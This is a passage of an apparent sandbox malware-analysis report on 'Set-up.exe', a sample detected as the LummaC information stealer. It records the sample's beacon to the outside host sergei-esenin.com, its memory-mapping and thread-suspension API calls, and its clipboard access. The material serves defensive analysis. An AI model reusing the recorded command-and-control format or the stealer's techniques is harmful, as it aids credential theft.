2024-10-13 09:42:23 UTC	806	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-13 09:42:23 UTC	1369	IN	Data Raw: 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 Data Ascii: -cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getEleme
2024-10-13 09:42:23 UTC	1369	IN	Data Raw: 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: cess-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-13 09:42:23 UTC	897	IN	Data Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e Data Ascii: </span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landin
2024-10-13 09:42:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	104.21.53.8	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:23 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=4G4G655HG37LedGy7IC8mS3vzKXQFLHIQIpWE8gp8rk-1728812542-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: sergei-esenin.com
2024-10-13 09:42:23 UTC	82	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33 Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033
2024-10-13 09:42:24 UTC	825	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=alga4nuranb6m54ood5o5btgse; expires=Thu, 06 Feb 2025 03:29:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z664yIr1vT6nyXVQj7IIzM1PPhFcJp7Q1VuFLHtk1g9h0BvMoXwWvjZr5iFzDOLcZOoHHL3OV%2BLqvXMyjl6MAaYGTJr%2BgwCJj4CPvbEeeTcDVo7ePzRORbQ8z8swvKKQYUxwlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e611efe084291-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:24 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:42:01
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xa60000
File size:	2'729'072 bytes
MD5 hash:	4B923F3600F76EA3FCF20959D94369AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:42:23
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600
Imagebase:	0x280000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	69.6%
Total number of Nodes:	56
Total number of Limit Nodes:	7

Executed Functions

Function 02A25F73 Relevance: 11.2, APIs: 7, Instructions: 742memorynativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02A26033
NtMapViewOfSection.NTDLL(?,00000000), ref: 02A260DF
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 02A2644A
NtMapViewOfSection.NTDLL(?,00000000), ref: 02A264FF
VirtualProtect.KERNELBASE(?,?,00000008,?), ref: 02A2651C
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 02A265C1
VirtualProtect.KERNELBASE(?,?,00000002,00000000), ref: 02A265F6

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$View$AllocCreate
String ID:
API String ID: 2664363762-0
Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction ID: cbfdc6c6eeae33d299409f46fbed0e68d13ae7b9371699ffa659e7dc0f3e0332
Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction Fuzzy Hash: 45428C71605321AFDB24CF68CC84B6AB7E9FF88B14F04482DF9859B241EB70E948CB51

Function 029D0C85 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,029D07CB,?,00000001,?,81EC8B55,000000FF), ref: 029D0CC3
Thread32First.KERNEL32(00000000,0000001C), ref: 029D0CEF
Wow64SuspendThread.KERNEL32(00000000), ref: 029D0D42
CloseHandle.KERNELBASE(00000000), ref: 029D0D6C

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: db279f418049d8a1ed46ce6f2b3b06a9d8adbefd4c24913d380844ad607320db
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 84410C75A00208AFDB18DF98C490BADB7FAEF88340F10C169E6159B7A4DB35AE45CB54

Function 029D0B35 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 029D0C01

Strings

,, xrefs: 029D0C4D

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: cdf2add27f6d091b884f95a61a592c4f7ed030ace805a0a661b371f02973162a
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: BD41E274A00209EFDB14CF98C994BAEBBB1FF88314F208598D515AB380D775AE85DF94

Function 029D0575 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 029D0818

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 199eae8584c575ccc8a049b37c905b29b8712e32bfa96fb22a8bbc98336ddc65
Instruction ID: b10a61370afe913d0e20b667ef5b73b9f9af5b70ace861d8c7499ee6b42477d7
Opcode Fuzzy Hash: 199eae8584c575ccc8a049b37c905b29b8712e32bfa96fb22a8bbc98336ddc65
Instruction Fuzzy Hash: B512B0B1E00219DFDB14CF98C990BADBBB2FF88304F2482A9D519AB385D7356A41DF54

Function 02A26C17 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02A26CA9

Strings

.dll, xrefs: 02A26C4E

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction ID: b542437d2c6df2250ebcd77209f74134f23687b06fe1628f3116afa26c2033d4
Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction Fuzzy Hash: 6B21E4716062A58FDB25EFADC8C4B6A7BA8EF05624F18506CD8428BA41DB30E8498780

Function 02A25835 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A258AE

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction ID: 0969073cd438e80a99e82cac96dbf288cfa71c41240d3a1f4fd118ffedcd33f4
Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction Fuzzy Hash: C4B1E372900722AFCB299B68CCC4BABF7E9FF05314F940519E69992140EF31E558DFA1

Non-executed Functions

Function 029E31E3 Relevance: 27.8, Strings: 22, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{`st, xrefs: 029E32AA
eI?K, xrefs: 029E353B
6E+G, xrefs: 029E3530
P!N#, xrefs: 029E34CD
8]S_, xrefs: 029E3572
O9M;, xrefs: 029E350F
htr^, xrefs: 029E32D6
I)^+, xrefs: 029E34E3
E-A/, xrefs: 029E34EE
jxdV, xrefs: 029E32C0
kbe;, xrefs: 029E32B5
,%"3, xrefs: 029E32CB
M%E', xrefs: 029E34D8
>M"O, xrefs: 029E3546
<Y?[, xrefs: 029E3567
5Q<S, xrefs: 029E3551
<?, xrefs: 029E35D4
7U9W, xrefs: 029E355C
&A-C, xrefs: 029E3525
jabc, xrefs: 029E357D
gjzF, xrefs: 029E3372
il~l, xrefs: 029E329F

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: &A-C$,%"3$5Q<S$6E+G$7U9W$8]S_$<?$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$eI?K$gjzF$htr^$il~l$jabc$jxdV$kbe;${`st
API String ID: 0-2613286265
Opcode ID: 3eb152603c7533615ada144dcef7b632b3087a7a6464d1a2fba3d5da55ee1adc
Instruction ID: ccdedd9af82c47e4e983694364f6ee395a12fa48f5abbc757d09bb6fc7563f3d
Opcode Fuzzy Hash: 3eb152603c7533615ada144dcef7b632b3087a7a6464d1a2fba3d5da55ee1adc
Instruction Fuzzy Hash: F4A1DCB050C3D18BD736CF25C4907EBBFE1AF96304F18899DC4CA9B242D735810A8B96

Function 02A0B122 Relevance: 24.1, Strings: 19, Instructions: 309COMMON

Download Yara Rule

Strings

R, xrefs: 02A0B2C4
>, xrefs: 02A0B343
], xrefs: 02A0B43F
H, xrefs: 02A0B49E
<, xrefs: 02A0B34D
<, xrefs: 02A0B1F6
?, xrefs: 02A0B1FB
>, xrefs: 02A0B200
?, xrefs: 02A0B135
>, xrefs: 02A0B13A
B, xrefs: 02A0B4A3
<, xrefs: 02A0B130
], xrefs: 02A0B2D3
a, xrefs: 02A0B2CE
r, xrefs: 02A0B4A8
l, xrefs: 02A0B2C9
G, xrefs: 02A0B444
9, xrefs: 02A0B33E
b, xrefs: 02A0B435

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 9$<$<$<$>$>$>$?$?$B$G$H$R$]$]$a$b$l$r
API String ID: 0-2109406571
Opcode ID: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
Instruction ID: d42d2e31695b6a483a329733c2e6152c2f74c45c89a117edda36d190eb82c6b2
Opcode Fuzzy Hash: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
Instruction Fuzzy Hash: 20B13362A0C7D08AD315817D999135EEEC24BE6228F1D8EAED4E5C73C7D579C806C363

Function 00AC6E10 Relevance: 23.2, Strings: 18, Instructions: 694COMMON

Download Yara Rule

Strings

Unmatched (, xrefs: 00AC747E
Undetermined reference, xrefs: 00AC752C
Too many  pairs, xrefs: 00AC7540
Pattern too long, xrefs: 00AC75B8
Null pattern inside , xrefs: 00AC7568
No previous regular expression, xrefs: 00AC75E7
Too many () pairs, xrefs: 00AC757C
Empty closure, xrefs: 00AC74F0
Unmatched \(, xrefs: 00AC748B
Null pattern inside (), xrefs: 00AC75A4
Missing ], xrefs: 00AC74C8
Null pattern inside \<\>, xrefs: 00AC7504
Missing ], xrefs: 00AC74B4
Illegal closure, xrefs: 00AC74DC
Missing ], xrefs: 00AC74A0
Cyclical reference, xrefs: 00AC7518
Unmatched \), xrefs: 00AC7554
Unmatched ), xrefs: 00AC7590

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: Cyclical reference$Empty closure$Illegal closure$Missing ]$Missing ]$Missing ]$No previous regular expression$Null pattern inside ()$Null pattern inside $Null pattern inside \<\>$Pattern too long$Too many () pairs$Too many  pairs$Undetermined reference$Unmatched ($Unmatched )$Unmatched $$Unmatched $
API String ID: 0-2700806723
Opcode ID: e46b83e5810129421068df7f9a597f9f2fcd2e4f1b2c66ee6a68be874a13c2f1
Instruction ID: f86baac1b03d03df06beed772acfa796f81caf8bdf8be101a88038fdbb582bec
Opcode Fuzzy Hash: e46b83e5810129421068df7f9a597f9f2fcd2e4f1b2c66ee6a68be874a13c2f1
Instruction Fuzzy Hash: AA42F671A0C28A8FDB15CF58D480BEEFFB2EB56310F1941AED4959B342C3765846CBA1

Function 00A6D420 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 412memorycomCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(mshjdic.hanjadic,?), ref: 00A6D57B
CoCreateInstance.OLE32(?,00000000,00000001,00C0DB18,?), ref: 00A6D598
SysAllocString.OLEAUT32(?), ref: 00A6D5E2
SysAllocString.OLEAUT32(00000000), ref: 00A6D629
SysFreeString.OLEAUT32(?), ref: 00A6D65A
SysFreeString.OLEAUT32(00000000), ref: 00A6D669
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6D73D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000), ref: 00A6D8D4

Strings

mshjdic.hanjadic, xrefs: 00A6D570
gfff, xrefs: 00A6D758
gfff, xrefs: 00A6D819

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: String$AllocFree_invalid_parameter_noinfo_noreturn$CreateFromInstanceProg
String ID: gfff$gfff$mshjdic.hanjadic
API String ID: 2540504531-1458457878
Opcode ID: 0614872b19737dc625ed8a17f0d85247c4e7a56b7353bc535c6c8e3bb2e39650
Instruction ID: 7ed55f7ab19081ddfa5760daf82bf684da7014b2b9c02685aef81d5e6e24e046
Opcode Fuzzy Hash: 0614872b19737dc625ed8a17f0d85247c4e7a56b7353bc535c6c8e3bb2e39650
Instruction Fuzzy Hash: C8027B74E002099FDB14DFA8C984AAEBBF5FF48304F14466DE816AB791DB31A945CF90

Function 00A73200 Relevance: 16.6, APIs: 11, Instructions: 70clipboardmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A71DD0: Sleep.KERNEL32(00000001), ref: 00A71DEF
Part of subcall function 00A71DD0: OpenClipboard.USER32 ref: 00A71DF6

EmptyClipboard.USER32 ref: 00A7321E

Part of subcall function 00A73110: GlobalAlloc.KERNEL32(00000042), ref: 00A73159
Part of subcall function 00A73110: GlobalLock.KERNEL32(00000000), ref: 00A73169

GlobalUnlock.KERNEL32(00000000), ref: 00A73250
SetClipboardData.USER32(0000000D,00000000), ref: 00A73259
SetClipboardData.USER32(?,00000000), ref: 00A7326E
GlobalAlloc.KERNEL32(00000042,00000001), ref: 00A73274
GlobalLock.KERNEL32(00000000), ref: 00A73282
GlobalUnlock.KERNEL32(00000000), ref: 00A73299
SetClipboardData.USER32(?,00000000), ref: 00A732A3
SetClipboardData.USER32(?,00000000), ref: 00A732B8
SetClipboardData.USER32(?,00000000), ref: 00A732C4
CloseClipboard.USER32 ref: 00A732C6

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Clipboard$Global$Data$AllocLockUnlock$CloseEmptyOpenSleep
String ID:
API String ID: 3851127881-0
Opcode ID: 1b9ec4d244d2dc8c2c5b444dea906f7e022ffb0703c2680bc8500ed6095d18de
Instruction ID: 95b2e3dfde27bca64a782b8550c2a6ebc997a10439f29cbee7539d7429e55624
Opcode Fuzzy Hash: 1b9ec4d244d2dc8c2c5b444dea906f7e022ffb0703c2680bc8500ed6095d18de
Instruction Fuzzy Hash: 67219F72A00214BBDF109BE5DC49BEEBBB9BF19311F018045F949A7191CB78AE40DBA4

Function 00A71E10 Relevance: 15.2, APIs: 10, Instructions: 174clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A71DD0: Sleep.KERNEL32(00000001), ref: 00A71DEF
Part of subcall function 00A71DD0: OpenClipboard.USER32 ref: 00A71DF6

IsClipboardFormatAvailable.USER32(?), ref: 00A71E9E
IsClipboardFormatAvailable.USER32(?), ref: 00A71EAC
IsClipboardFormatAvailable.USER32(?), ref: 00A71EDD
GlobalLock.KERNEL32(00000000), ref: 00A71EFF
GlobalSize.KERNEL32(00000000), ref: 00A71F0D
GlobalUnlock.KERNEL32(00000000), ref: 00A71F27
GlobalLock.KERNEL32(00000000), ref: 00A71F4E
GlobalUnlock.KERNEL32(00000000), ref: 00A71FAB

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
